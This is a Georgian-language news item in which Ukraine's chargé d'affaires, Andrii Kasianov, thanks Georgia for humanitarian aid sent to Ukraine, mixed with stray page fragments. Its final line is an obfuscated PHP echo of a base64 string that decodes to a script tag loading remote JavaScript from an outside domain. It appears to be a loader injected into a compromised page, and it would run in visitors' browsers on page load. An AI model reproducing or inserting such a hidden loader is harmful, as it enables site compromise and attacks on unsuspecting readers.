celsiusi
ავერსი საქკაბელი
უკრაინის საქმეთა დროებითმა რწმუნებულმა საქართველოში, ანდრეი კასიანოვმა ჰუმანიტარულ დახმარებაზე საუბრისას ბრიფინგზე ქართველ ხალხს მადლობა გადაუხადა და აღნიშნა, რომ საქართველოს მიერ გაგზავნილი ჰუმანიტარული დახმარება უკრაინისთვის ძალიან „დროული და მნიშვნელოვანია“.
 
„ჩვენ ძალიან მადლობლები ვართ პოლონეთის, მეგობრების, ასეთი სოლიდარობისა და მხარდაჭერისთვის და ჩვენ ამას არასდროს არ დავივიწყებთ. საქართველო ასევე გვიდგას გვერდში ამ საკითხში. 6 მარტს, კვირას უკრაინაში გაიგზავნა თვითმფრინავი ჰუმანიტარული დახმარებით, სამედიცინო აღჭურვილობა 40 ტონა, მედიკამენტები, სურსათი ტანსაცმელი, ჰიგიენური საშუალებები და ყველაფერი, რასაც ძალიან საჭიროებს ახლა უკრაინის მოსახლეობა. ეს არის ძალიან დროული და მნიშვნელოვანი დახმარება. უკრაინის საელჩო საქართველოში გამოთქვამს მადლიერებას პირველ რიგში საქართველოში ყველა უკრაინელის მიმართ, ასევე მადლობას უხდის საქართველოს მოქალაქეებს, საქმიანი წრეების წარმომადგენლებს, საქართველოს მთავრობას, საქართველოს მართლმადიდებელ ეკლესიას უკრაინის მხარდაჭერისთვის უკრაინისთვის ასეთ რთულ დროს. 
 
მინდა მივმართო საქართველოს ყველა მოქალაქეს, ქართველებო, თქვენ არაჩვეულებრივები ხართ, აღფრთოვანებული ვარ უკრაინის მხარდაჭერის დონით, უსაზღვროა ჰუმანიტარული დახმარება, მიტინგები უკრაინის მხარდასაჭერად, საქართველოს ტერიტორიაზე, თქვენთან, თქვენს ოჯახებში უკრაინის მოქალაქეების დაბინავებასთან დაკავშირებული წინადადებები, ყველა ქუჩა, ხიდები უკრაინის დროშის ფერებშია, ჩვენ უკრაინელები ვგრძნობთ, რომ თქვენ ყოველთვის ჩვენ გვერდით ხართ და უკრაინასთან ერთად მზად ხართ, იბრძოლოთ თქვენი დამოუკიდებლობისთვის, დემოკრატიისთვის და თქვენი თავისუფალი არჩევანისთვის“– განაცხადა ანდრია კასიანოვმა.
 
1025
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");